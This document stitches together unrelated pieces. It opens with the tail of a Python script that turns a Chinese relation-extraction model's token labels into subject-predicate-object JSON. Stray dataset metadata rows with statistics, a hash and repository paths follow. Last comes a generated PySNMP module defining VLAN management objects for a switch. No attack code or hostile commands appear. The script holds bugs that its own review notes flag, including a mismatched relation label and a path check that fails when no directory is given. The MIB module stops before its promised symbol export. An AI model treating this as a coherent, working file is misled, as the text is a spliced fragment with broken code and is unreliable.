        #self.relationship_label_list = ['丈夫', '上映时间', '专业代码', '主持人', '主演', '主角', '人口数量', '作曲', '作者', '作词', '修业年限', '出品公司', '出版社', '出生地', '出生日期', '创始人', '制片人', '占地面积', '号', '嘉宾', '国籍', '妻子', '字', '官方语言', '导演', '总部地点', '成立日期', '所在城市', '所属专辑', '改编自', '朝代', '歌手', '母亲', '毕业院校', '民族', '气候', '注册资本', '海拔', '父亲', '目', '祖籍', '简称', '编剧', '董事长', '身高', '连载网站', '邮政编码', '面积', '首都']
        # NOTE(review): 'LaneOfRoad' here does not match the 'Lane_of_Road'
        # key in schemas_dict_relation_2_object_subject_type — verify.
        self.relationship_label_list = ['Road_status','Lane_status','At','PRIOR', 'PAST', 'Bet', 'LaneOfRoad','Lane_direction','Lane_position','Road_direction','Lane_number']
        self.Competition_Mode = Competition_Mode
        print("test数据输入路径是:\t{}".format(self.TEST_DATA_DIR))
        print("最新模型预测结果路径是:\t{}".format(self.MODEL_OUTPUT_DIR))
    def get_input_list(self,):
        """Read all input files; pad the reference spo list with None when absent."""
        content_list_summary, self.file_line_number = self.read_file_return_content_list()
        if len(content_list_summary) == 4:
            [text_sentence_list, token_in_not_NUK_list, token_label_list, reference_spo_list] = content_list_summary
        elif len(content_list_summary) == 3:
            # No reference spo file: pad with None so the zip() downstream still works.
            [text_sentence_list, token_in_not_NUK_list, token_label_list] = content_list_summary
            reference_spo_list = [None] * len(text_sentence_list)
        else:
            raise ValueError("check code!")
        print(reference_spo_list)
        return text_sentence_list, token_in_not_NUK_list, token_label_list, reference_spo_list
    # Merge WordPiece sub-tokens and single characters back into whole words.
    def _merge_WordPiece_and_single_word(self, entity_sort_list):
        # [..['B-SUB', '新', '地', '球', 'ge', '##nes', '##is'] ..]---> [..('SUB', '新地球genesis')..]
        entity_sort_tuple_list = []
        for a_entity_list in entity_sort_list:
            entity_content = ""
            entity_type = None
            for idx, entity_part in enumerate(a_entity_list):
                if idx == 0:
                    # First element is the label; skip lists not starting with B-/I-.
                    entity_type = entity_part
                    if entity_type[:2] not in ["B-", "I-"]:
                        break
                else:
                    # "##"-prefixed WordPiece parts are glued on without the marker.
                    if entity_part.startswith("##"):
                        entity_content += entity_part.replace("##", "")
                    else:
                        entity_content += entity_part
            if entity_content != "":
                entity_sort_tuple_list.append((entity_type[2:], entity_content))
        return entity_sort_tuple_list
    # Convert spo_out.txt's [SPO_SEP]-joined form into a list of dicts, e.g.
    # "妻子 人物 人物 杨淑慧 周佛海[SPO_SEP]丈夫 人物 人物 周佛海 杨淑慧" ---> dict
    def preprocessing_reference_spo_list(self, refer_spo_str):
        refer_spo_list = refer_spo_str.split("[SPO_SEP]")
        refer_spo_list = [spo.split(" ") for spo in refer_spo_list]
        refer_spo_list = [dict([('predicate', spo[0]),
                                ('object_type', spo[2]), ('subject_type', spo[1]),
                                ('object', spo[4]), ('subject', spo[3])]) for spo in refer_spo_list]
        print(refer_spo_list)
        refer_spo_list.sort(key= lambda item:item['predicate'])
        return refer_spo_list
    # Emit the model's entity labels in their original sentence order.
    def model_token_label_2_entity_sort_tuple_list(self, token_in_not_UNK_list, predicate_token_label_list):
        """
        :param token_in_not_UNK: ['紫', '菊', '花', '草', '是', '菊', '目', ',', '菊', '科', ',', '松', '果', '菊', '属', '的', '植', '物']
        :param predicate_token_label: ['B-SUB', 'I-SUB', 'I-SUB', 'I-SUB', 'O', 'B-OBJ', 'I-OBJ', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O']
        :return: [('SUB', '紫菊花草'), ('OBJ', '菊目')]
        """
        # Strip the special symbols emitted by the model.
        def preprocessing_model_token_lable(predicate_token_label_list, token_in_list_lenth):
            # TODO: check for errors and correct them
            if predicate_token_label_list[0] == "[CLS]":
                predicate_token_label_list = predicate_token_label_list[1:]  # y_predict.remove('[CLS]')
            if len(predicate_token_label_list) > token_in_list_lenth:  # keep only the input-sequence length
                predicate_token_label_list = predicate_token_label_list[:token_in_list_lenth]
            return predicate_token_label_list
        # Preprocess the predicted label list.
        predicate_token_label_list = preprocessing_model_token_lable(predicate_token_label_list, len(token_in_not_UNK_list))
        entity_sort_list = []
        entity_part_list = []
        # TODO: the branching below may not be fully exhaustive; review.
        for idx, token_label in enumerate(predicate_token_label_list):
            # Label "O": outside any entity.
            if token_label == "O":
                # If an entity is being collected, commit it now.
                if len(entity_part_list) > 0:
                    entity_sort_list.append(entity_part_list)
                    entity_part_list = []
            # Label starting with "B-": beginning of a new entity.
            if token_label.startswith("B-"):
                # Commit any entity already being collected first.
                if len(entity_part_list) > 0:
                    entity_sort_list.append(entity_part_list)
                    entity_part_list = []
                entity_part_list.append(token_label)
                entity_part_list.append(token_in_not_UNK_list[idx])
                # Commit if this is the last label of the sequence.
                if idx == len(predicate_token_label_list) - 1:
                    entity_sort_list.append(entity_part_list)
            # Label starting with "I-" (or "[##WordPiece]"): entity continues.
            if token_label.startswith("I-") or token_label == "[##WordPiece]":
                # Only extend an entity that has already been started.
                if len(entity_part_list) > 0:
                    entity_part_list.append(' ')  # needed for English (space-joined); not for Chinese
                    entity_part_list.append(token_in_not_UNK_list[idx])
                # Commit if this is the last label of the sequence.
                if idx == len(predicate_token_label_list) - 1:
                    entity_sort_list.append(entity_part_list)
            # "[SEP]" marks the end of the labeled portion.
            if token_label == "[SEP]":
                break
        entity_sort_tuple_list = self._merge_WordPiece_and_single_word(entity_sort_list)
        print(entity_sort_tuple_list)
        return entity_sort_tuple_list
    # Generator: yield (text, predicate, entities, reference spo) per input line.
    def produce_relationship_and_entity_sort_list(self):
        text_sentence_list, token_in_not_NUK_list, token_label_list, reference_spo_list = self.get_input_list()
        for [text_sentence, token_in_not_UNK, token_label, refer_spo_str] in\
                zip(text_sentence_list, token_in_not_NUK_list, token_label_list, reference_spo_list):
            # Each line is "sentence\tpredicate"; both files must agree on the predicate.
            text = text_sentence.split("\t")[0]
            text_predicate = text_sentence.split("\t")[1]
            token_in = token_in_not_UNK.split("\t")[0].split(" ")
            token_in_predicate = token_in_not_UNK.split("\t")[1]
            assert text_predicate == token_in_predicate
            token_label_out = token_label.split(" ")
            entity_sort_tuple_list = self.model_token_label_2_entity_sort_tuple_list(token_in, token_label_out)
            if self.Competition_Mode:
                yield text, text_predicate, entity_sort_tuple_list, None
            else:
                if refer_spo_str is not None:
                    refer_spo_list = self.preprocessing_reference_spo_list(refer_spo_str)
                else:
                    refer_spo_list = []
                yield text, text_predicate, entity_sort_tuple_list, refer_spo_list
    # Debug helper: print the first 100 sorted relation/entity results.
    def show_produce_relationship_and_entity_sort_list(self):
        idx = 0
        for text, text_predicate, entity_sort_tuple_list, refer_spo_list in self.produce_relationship_and_entity_sort_list():
            print("序号: ", idx + 1)
            print("原句: ", text)
            print("预测的关系: ", text_predicate)
            print("预测的实体: ", entity_sort_tuple_list)
            print("参考的 spo_slit:", refer_spo_list)
            print("\n")
            idx += 1
            if idx == 100:
                break
    def produce_output_file(self, OUT_RESULTS_DIR=None, keep_empty_spo_list=False):
        """Write the predicted spo triples as one JSON object per line."""
        filename = "subject_predicate_object_predict_output.json"
        output_dict = dict()
        for text, text_predicate, entity_sort_tuple_list, refer_spo_list in self.produce_relationship_and_entity_sort_list():
            object_type, subject_type = schemas_dict_relation_2_object_subject_type[text_predicate][0]
            # Deduplicate SUB/OBJ entities and drop those shorter than 2 characters.
            subject_list = [value for name, value in entity_sort_tuple_list if name == "SUB"]
            subject_list = list(set(subject_list))
            subject_list = [value for value in subject_list if len(value) >= 2]
            object_list = [value for name, value in entity_sort_tuple_list if name == "OBJ"]
            object_list = list(set(object_list))
            object_list = [value for value in object_list if len(value) >= 2]
            # Record the sentence even when no (subject, object) pair was found.
            if len(subject_list) == 0 or len(object_list) == 0:
                output_dict.setdefault(text, [])
            for subject_value in subject_list:
                for object_value in object_list:
                    output_dict.setdefault(text, []).append({"object_type": object_type, "predicate": text_predicate,
                                                             "object": object_value, "subject_type": subject_type,
                                                             "subject": subject_value})
        if keep_empty_spo_list:
            filename = "keep_empty_spo_list_" + filename
        if OUT_RESULTS_DIR is None:
            out_path = filename
        else:
            out_path = os.path.join(OUT_RESULTS_DIR, filename)
        print("生成结果的输出路径是:\t{}".format(out_path))
        # NOTE(review): os.path.exists(None) raises if OUT_RESULTS_DIR is None — verify callers.
        if not os.path.exists(OUT_RESULTS_DIR):
            os.makedirs(OUT_RESULTS_DIR)
        result_json_write_f = open(out_path, "w", encoding='utf-8')
        count_line_number = 0
        count_empty_line_number = 0
        for text, spo_list in output_dict.items():
            count_line_number += 1
            line_dict = dict()
            line_dict["text"] = text
            line_dict["spo_list"] = spo_list
            line_json = json.dumps(line_dict, ensure_ascii=False)
            if len(spo_list) == 0:
                # Empty results are only written when keep_empty_spo_list is set.
                count_empty_line_number += 1
                if keep_empty_spo_list:
                    result_json_write_f.write(line_json + "\n")
            else:
                if len(spo_list) > 0:  # NOTE(review): redundant re-check of the else branch
                    result_json_write_f.write(line_json + "\n")
        print("empty_line: {}, line: {}, percentage: {:.2f}%".format(count_empty_line_number, count_line_number,
                                                                     (count_empty_line_number / count_line_number) * 100))
if __name__=='__main__':
    # Run the full pipeline: read predictions, build spo triples, write JSON.
    TEST_DATA_DIR = "bin/subject_object_labeling/sequence_labeling_data/test"
    # MODEL_OUTPUT_DIR = "output/sequnce_infer_out/epochs9/ckpt20000"
    MODEL_OUTPUT_DIR = None  # None -> auto-detect the newest prediction dir
    OUT_RESULTS_DIR = "output/final_text_spo_list_result"
    Competition_Mode = True
    spo_list_manager = Sorted_relation_and_entity_list_Management(TEST_DATA_DIR, MODEL_OUTPUT_DIR, Competition_Mode=Competition_Mode)
    spo_list_manager.produce_output_file(OUT_RESULTS_DIR=OUT_RESULTS_DIR, keep_empty_spo_list=True)
| 49.834783
| 370
| 0.600651
| 14,736
| 0.765944
| 1,212
| 0.062997
| 0
| 0
| 0
| 0
| 6,545
| 0.340194
|
36957809b7a097e9aca4a9f73c606e574242991c
| 18,656
|
py
|
Python
|
pysnmp-with-texts/SW-VLAN-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 8
|
2019-05-09T17:04:00.000Z
|
2021-06-09T06:50:51.000Z
|
pysnmp-with-texts/SW-VLAN-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 4
|
2019-05-31T16:42:59.000Z
|
2020-01-31T21:57:17.000Z
|
pysnmp-with-texts/SW-VLAN-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module SW-VLAN-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/SW-VLAN-MIB
# Produced by pysmi-0.3.4 at Wed May 1 15:12:44 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ValueSizeConstraint, ConstraintsUnion, ConstraintsIntersection, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsUnion", "ConstraintsIntersection", "SingleValueConstraint")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
enterprises, iso, ModuleIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, Counter32, Integer32, Unsigned32, Gauge32, IpAddress, ObjectIdentity, MibIdentifier, Counter64, TimeTicks, NotificationType = mibBuilder.importSymbols("SNMPv2-SMI", "enterprises", "iso", "ModuleIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Bits", "Counter32", "Integer32", "Unsigned32", "Gauge32", "IpAddress", "ObjectIdentity", "MibIdentifier", "Counter64", "TimeTicks", "NotificationType")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
class MacAddress(OctetString):
    # MAC address: an OCTET STRING of exactly 6 octets.
    subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(6, 6)
    fixedLength = 6
class VlanIndex(Integer32):
    # VLAN id constrained to 1..4094 (the valid 802.1Q range).
    subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(1, 4094)
class PortList(OctetString):
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(12, 12)
fixedLength = 12
# ---- Generated OID registration tree (enterprises.326 = marconi) ----
marconi = MibIdentifier((1, 3, 6, 1, 4, 1, 326))
systems = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2))
external = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20))
dlink = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1))
dlinkcommon = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 1))
golf = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2))
golfproducts = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 1))
es2000 = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 1, 3))
golfcommon = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2))
marconi_mgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2)).setLabel("marconi-mgmt")
es2000Mgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28))
swL2Mgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2))
swVlan = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8))
swVlanCtrl = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 1))
swMacBaseVlan = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2))
swPortBaseVlan = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3))
# ---- VLAN control scalars (mode selection and SNMP port membership) ----
swVlanCtrlMode = MibScalar((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("mac-base", 3), ("ieee8021q", 4), ("port-base", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swVlanCtrlMode.setStatus('mandatory')
if mibBuilder.loadTexts: swVlanCtrlMode.setDescription('This object controls which Vlan function will be enable (or disable) when the switch hub restart at the startup (power on) or warm start.')
swVlanInfoStatus = MibScalar((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("mac-base", 3), ("ieee8021q", 4), ("port-base", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swVlanInfoStatus.setStatus('mandatory')
if mibBuilder.loadTexts: swVlanInfoStatus.setDescription('This object indicates which Vlan function be enable (or disable) in mandatoryly stage. There are no effect when change swVlanCtrlMode vlaue in the system running.')
swVlanSnmpPortVlan = MibScalar((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 1, 3), VlanIndex()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swVlanSnmpPortVlan.setStatus('mandatory')
if mibBuilder.loadTexts: swVlanSnmpPortVlan.setDescription('Indicates the Vlan which the SNMP port belongs to. The value range is 1 to 4094.')
# ---- MAC-based VLAN: capacity scalars, per-VLAN control table, address table ----
swMacBaseVlanInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 1))
swMacBaseVlanMaxNum = MibScalar((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swMacBaseVlanMaxNum.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanMaxNum.setDescription('The maximum number of Mac base Vlan allowed by the system.')
swMacBaseVlanAddrMaxNum = MibScalar((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swMacBaseVlanAddrMaxNum.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanAddrMaxNum.setDescription('The maximum number of entries in Mac-based Vlan address table.')
# Control table: one row per MAC-based VLAN, indexed by its description string.
swMacBaseVlanCtrlTable = MibTable((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 2), )
if mibBuilder.loadTexts: swMacBaseVlanCtrlTable.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanCtrlTable.setDescription('A table that contains information about MAC base Vlan entries for which the switch has forwarding and/or filtering information. This information is used by the transparent switching function in determining how to propagate a received frame.')
swMacBaseVlanCtrlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 2, 1), ).setIndexNames((0, "SW-VLAN-MIB", "swMacBaseVlanDesc"))
if mibBuilder.loadTexts: swMacBaseVlanCtrlEntry.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanCtrlEntry.setDescription('A list of information about a specific MAC base Vlan configuration portlist for which the switch has some forwarding and/or filtering information.')
swMacBaseVlanDesc = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 2, 1, 1), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(1, 12))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swMacBaseVlanDesc.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanDesc.setDescription('A textual description of the Mac Base Vlan for memorization. The string cannot set to empty string. There is a default value for this string.')
swMacBaseVlanMacMember = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 2, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swMacBaseVlanMacMember.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanMacMember.setDescription('This object indicates the total number of MAC addresses contained in the VLAN entry.')
swMacBaseVlanCtrlState = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 2, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swMacBaseVlanCtrlState.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanCtrlState.setDescription('This object indicates the MacBase Vlan state.')
# Address table: one row per unicast/multicast MAC address, indexed by the address.
swMacBaseVlanAddrTable = MibTable((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 3), )
if mibBuilder.loadTexts: swMacBaseVlanAddrTable.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanAddrTable.setDescription('A table that contains information about unicast or multicast entries for which the switch has forwarding and/or filtering information. This information is used by the transparent switching function in determining how to propagate a received frame. Note that the priority of MacBaseVlanAddr table entries is lowest than Filtering Table and FDB Table, i.e. if there is a table hash collision between the entries of MacBaseVlanAddr Table and Filtering Table inside the switch H/W address table, then Filtering Table entry overwrite the colliding entry of MacBaseVlanAddr Table. This state is same of FDB table. See swFdbFilterTable and swFdbStaticTable description also.')
swMacBaseVlanAddrEntry = MibTableRow((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 3, 1), ).setIndexNames((0, "SW-VLAN-MIB", "swMacBaseVlanAddr"))
if mibBuilder.loadTexts: swMacBaseVlanAddrEntry.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanAddrEntry.setDescription('A list of information about a specific unicast or multicast MAC address for which the switch has some forwarding and/or filtering information.')
swMacBaseVlanAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 3, 1, 1), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swMacBaseVlanAddr.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanAddr.setDescription('This object indictaes a unicast or multicast MAC address for which the bridge has forwarding and/or filtering information.')
swMacBaseVlanAddrVlanDesc = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 3, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(1, 64))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swMacBaseVlanAddrVlanDesc.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanAddrVlanDesc.setDescription('A textual description of the Mac Base Vlan for memorization.')
swMacBaseVlanAddrState = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 3, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("invalid", 2), ("valid", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swMacBaseVlanAddrState.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanAddrState.setDescription('This object indicates the MacBase Vlan Address entry state. other(1) - this entry is currently in use but the conditions under which it will remain so are different from each of the following values. invalid(2) - writing this value to the object, and then the corresponding entry will be removed from the table. valid(3) - this entry is reside in the table.')
swMacBaseVlanAddrStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 3, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("apply", 2), ("not-apply", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swMacBaseVlanAddrStatus.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanAddrStatus.setDescription('This object indicates the MacBase Vlan Address entry state. other(1) - this entry is currently in use but the conditions under which it will remain so are different from each of the following values. apply(2) - this entry is currently in use and reside in the table. not-apply(3) - this entry is reside in the table but currently not in use due to conflict with filter table.')
# ---- Port-based VLAN: count scalar, default-VLAN table, configurable table ----
swPortBaseVlanTotalNum = MibScalar((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swPortBaseVlanTotalNum.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanTotalNum.setDescription('The total number of Port-Base Vlan which is in enabled state within this switch hub.')
# Read-only view of the system-maintained default VLAN (VID 1).
swPortBaseVlanDefaultVlanTable = MibTable((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 2), )
if mibBuilder.loadTexts: swPortBaseVlanDefaultVlanTable.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanDefaultVlanTable.setDescription('A table that contains default Port-Based VLAN list entries for the switch. The entry (Vid = 1,i.e. swPortBaseVlanDefaultPvid = 1) is defalut Port-Based VLAN , maintained by system.')
swPortBaseVlanDefaultVlanEntry = MibTableRow((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 2, 1), ).setIndexNames((0, "SW-VLAN-MIB", "swPortBaseVlanDefaultPvid"))
if mibBuilder.loadTexts: swPortBaseVlanDefaultVlanEntry.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanDefaultVlanEntry.setDescription('A list of default Port-Based VLAN information in swPortBaseVlanDefaultVlanTable.')
swPortBaseVlanDefaultPvid = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swPortBaseVlanDefaultPvid.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanDefaultPvid.setDescription('This object indicates the default Port-Base Vlan ID. It occupies only 1 entry in VLAN table, with VID=1.')
swPortBaseVlanDefaultDesc = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(1, 12))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swPortBaseVlanDefaultDesc.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanDefaultDesc.setDescription('A textual description of the Port-Base Vlan.')
swPortBaseVlanDefaultPortList = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 2, 1, 3), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swPortBaseVlanDefaultPortList.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanDefaultPortList.setDescription('This object indicates the port member set of the specified Vlan. Each Vlan has a octect string to indicate the port map. The most significant bit represents the lowest numbered port, and the least significant bit represents the highest numbered port.')
swPortBaseVlanDefaultPortNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 2, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swPortBaseVlanDefaultPortNumber.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanDefaultPortNumber.setDescription('This object indicates the number of ports of the entry.')
# Read-write table for user-defined port-based VLANs (VIDs 2..12).
swPortBaseVlanConfigTable = MibTable((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 3), )
if mibBuilder.loadTexts: swPortBaseVlanConfigTable.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanConfigTable.setDescription("A table that contains Port-Based VLAN list entries for the switch. The device can't support port overlapping in Port-Based VLAN.")
swPortBaseVlanConfigEntry = MibTableRow((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 3, 1), ).setIndexNames((0, "SW-VLAN-MIB", "swPortBaseVlanConfigPvid"))
if mibBuilder.loadTexts: swPortBaseVlanConfigEntry.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanConfigEntry.setDescription('A list of information about a specific Port-Based VLAN configuration in swPortBaseVlanConfigTable.')
swPortBaseVlanConfigPvid = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(2, 12))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swPortBaseVlanConfigPvid.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanConfigPvid.setDescription('This object indicates the Port-Base Vlan ID. There are up to 11 entries for current product now. The object range varies from 2 to 12.')
swPortBaseVlanConfigDesc = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 3, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(1, 12))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swPortBaseVlanConfigDesc.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanConfigDesc.setDescription('A textual description of the Port-Base Vlan. It cannot be a null string. And each description must be unique in the table.')
swPortBaseVlanConfigPortList = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 3, 1, 3), PortList()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swPortBaseVlanConfigPortList.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanConfigPortList.setDescription('This object indicates which ports are belong to the Vlan. Each Vlan has a octect string to indicate with port map. The most significant bit represents the lowest numbered port, and the least significant bit represents the highest numbered port.')
swPortBaseVlanConfigPortNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 3, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swPortBaseVlanConfigPortNumber.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanConfigPortNumber.setDescription('This object indicates the number of ports of the entry.')
# Register every generated symbol with the MIB builder so other modules can
# import them by name from "SW-VLAN-MIB".
